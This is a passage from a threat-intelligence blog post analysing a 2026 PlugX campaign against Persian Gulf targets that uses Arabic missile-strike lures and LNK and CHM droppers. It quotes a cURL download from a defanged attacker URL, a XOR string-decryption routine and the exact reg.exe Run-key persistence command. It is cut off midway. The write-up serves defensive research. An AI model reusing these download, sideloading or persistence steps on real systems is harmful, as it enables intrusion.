IntroductionOn March 1, 2026, ThreatLabz observed new activity from a China-nexus threat actor targeting countries in the Persian Gulf region. The activity took place within the first 24 hours of the renewed conflict in the Middle East. The threat actor quickly weaponized the theme of the conflict, using an Arabic-language document lure depicting missile attacks for social engineering.The campaign used a multi-stage attack chain that ultimately deployed a PlugX backdoor variant. Based on the tools, techniques, and procedures (TTPs) observed, ThreatLabz attributes this activity to a China-nexus threat actor with high confidence, and assesses with medium confidence that it may be linked to Mustang Panda.In this blog post, ThreatLabz examines the end-to-end attack chain in depth, including Windows shortcut (LNK) and CHM-based droppers, a loader with highly obfuscated shellcode, and a PlugX backdoor.Key TakeawaysIn March 2026, ThreatLabz observed activity by a China-nexus threat actor targeting countries in the Persian Gulf region.The campaign used a multi-stage attack chain to deploy a PlugX backdoor variant on infected systems.The shellcode and PlugX backdoor used obfuscation techniques such as control flow flattening (CFF) and mixed boolean arithmetic (MBA) to hinder reverse engineering.The PlugX variant in this campaign supports HTTPS for command-and-control (C2) communication and DNS-over-HTTPS (DOH) for domain resolution. Technical AnalysisAttack chainOn March 1, 2026, ThreatLabz identified an attack chain themed around the ongoing Middle East conflict that delivered its payloads via a ZIP archive. The archive included a Windows shortcut (LNK) file that, when opened, downloaded a malicious Windows Compiled HTML Help (CHM) file from a threat actor-controlled server. The CHM content was then leveraged to deploy a multi-stage payload, progressing from a shellcode loader to heavily obfuscated shellcode, and ultimately to the installation of a PlugX backdoor variant. The attack chain is shown in the figure below.Figure 1: Attack chain leading to deployment of PlugX.As part of the lure, the attack dropped a decoy PDF containing images of missile strikes. The Arabic text in the PDF translates to “Iranian missile strikes against US base in Bahrain”. The figure below shows the decoy PDF file used in this attack.Figure 2: PDF lure referencing Iranian missile strikes against a US base in Bahrain.The following sections summarize the observed attack flow and the files involved.Stage 1 (ZIP, CHM, and LNK)The ZIP archive contains an LNK file named photo_2026-03-01_01-20-48.pdf.lnk. The LNK’s target command line uses cURL to download a malicious CHM file from hxxps://www.360printsol[.]com/2026/alfadhalah/thumbnail?img=index.png. The LNK file then uses the legitimate Windows HTML Help executable (hh.exe) with the -decompile option to extract the CHM contents. The below table summarizes the files extracted from the CHM.FilenameDescription 0.lnkStage 2 Windows shortcut.3Decoy PDF used as a lure.4TAR archive containing malicious components.Table 1: Files extracted from the CHMThe Stage 1 LNK launches the Stage 2 shortcut (0.lnk).Stage 2 (Second LNK, decoy PDF, and TAR extraction)The Stage 2 LNK performs the following actions:Moves the decoy PDF from the file named 3 to photo_2026-03-01_01-20-48.pdf (in the same directory).Treats file 4 as a TAR archive and extracts its contents into %AppData%.Executes %AppData%\BaiduNetdisk\ShellFolder.exe with the argument: –path a.The figure below shows the directory structure of the files extracted from the TAR archive.Figure 3: Directory structure of the TAR archive.Next, ShellFolder.exe uses DLL sideloading to load a malicious DLL named ShellFolderDepend.dll.ShellFolderDepend.dll analysis (shellcode loader)ShellFolderDepend.dll is a 32-bit DLL that establishes persistence, and then decrypts and executes an encrypted shellcode payload stored in Shelter.ex.The shellcode loader stores its strings in encrypted form and decrypts them at runtime using a custom index-based XOR algorithm that incorporates an additive constant, as shown below. KEY_BASE = 0x34
decrypted = []
for i, byte in enumerate(encrypted_bytes):
key = (i + KEY_BASE) & 0xFF
decrypted.append(chr(byte ^ key))
return “”.join(decrypted)To establish persistence, the DLL enumerates running processes to determine whether bdagent.exe (Bitdefender Agent) is present. Based on the result, the DLL uses one of two persistence methods:If bdagent.exe is running, the DLL uses reg.exe to set a Run entry pointing to the host binary (ShellFolder.exe) to start the malware when a user logs in: C:\Windows\System32\reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /reg:64 /v BaiNetdisk /t REG_SZ /d “\”%s\” –path a” /f.If bdagent.exe is not running, the DLL sets the same Run entry directly using RegSetValueExA.Before decrypting and loading the shellcode, the shellcode l
[…]
Content was cut in order to protect the source.Please visit the source for the rest of the article.
Read the original article: